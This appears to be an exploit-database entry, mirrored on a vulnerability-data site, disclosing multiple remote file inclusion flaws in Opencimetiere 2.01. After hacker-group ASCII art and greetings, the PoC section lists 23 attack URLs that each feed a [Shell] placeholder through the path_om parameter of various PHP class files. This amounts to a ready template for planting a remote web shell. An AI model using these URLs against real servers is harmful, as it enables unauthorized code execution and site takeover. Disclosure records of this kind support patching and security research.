Lucene search
K

Opencimetiere 2.01 - Multiple Remote File Inclusions

🗓️ 01 May 2010 00:00:00Reported by cr4wl3rType 
exploitpack
 exploitpack
👁 11 Views

Opencimetiere 2.01 Multiple Remote File Include Vulnerability allows remote attackers to include arbitrary files via a URL in the path_om parameter, as demonstrated in the PoC

Code
=============================================================
Opencimetiere 2.01 Multiple Remote File Include Vulnerability
=============================================================

[+] Opencimetiere 2.01 Multiple Remote File Include Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm cr4wl3r  member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: cr4wl3r
[+] Download: https://adullact.net/frs/download.php/4303/openmairie_cimetiere_2.01.zip
[+] Greetz: All member inj3ct0r.com, manadocoding.net, sekuritionline.net, gcc.web.id

[+] Thanks to: opt!x hacker, xoron, cyberlog, irvian, antihack, angky.tatoki, 
               EA ngel, zvtral, s4va, bL4Ck_3n91n3, untouch, team_elite, zreg, mywisdom, 
               SENOT, kec0a, d3viln3t, p4p4y, cybertomat, etaxCrew, emen, and all my friend

[+] PoC:

http://[site]/[path]/obj/autorisation.class.php?path_om=[Shell]
http://[site]/[path]/obj/courrierautorisation.class.php?path_om=[Shell]
http://[site]/[path]/obj/droit.class.php?path_om=[Shell]
http://[site]/[path]/obj/profil.class.php?path_om=[Shell]
http://[site]/[path]/obj/temp_defunt_sansemplacement.class.php?path_om=[Shell]
http://[site]/[path]/obj/utils.class.php?path_om=[Shell]
http://[site]/[path]/obj/cimetiere.class.php?path_om=[Shell]
http://[site]/[path]/obj/defunt.class.php?path_om=[Shell]
http://[site]/[path]/obj/emplacement.class.php?path_om=[Shell]
http://[site]/[path]/obj/tab_emplacement.class.php?path_om=[Shell]
http://[site]/[path]/obj/temp_emplacement.class.php?path_om=[Shell]
http://[site]/[path]/obj/voie.class.php?path_om=[Shell]
http://[site]/[path]/obj/collectivite.class.php?path_om=[Shell]
http://[site]/[path]/obj/defunttransfert.class.php?path_om=[Shell]
http://[site]/[path]/obj/entreprise.class.php?path_om=[Shell]
http://[site]/[path]/obj/temp_autorisation.class.php?path_om=[Shell]
http://[site]/[path]/obj/travaux.class.php?path_om=[Shell]
http://[site]/[path]/obj/zone.class.php?path_om=[Shell]
http://[site]/[path]/obj/courrier.class.php?path_om=[Shell]
http://[site]/[path]/obj/dossier.class.php?path_om=[Shell]
http://[site]/[path]/obj/plans.class.php?path_om=[Shell]
http://[site]/[path]/obj/temp_defunt.class.php?path_om=[Shell]
http://[site]/[path]/obj/utilisateur.class.php?path_om=[Shell]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 May 2010 00:00Current
0.2Low risk
Vulners AI Score0.2
11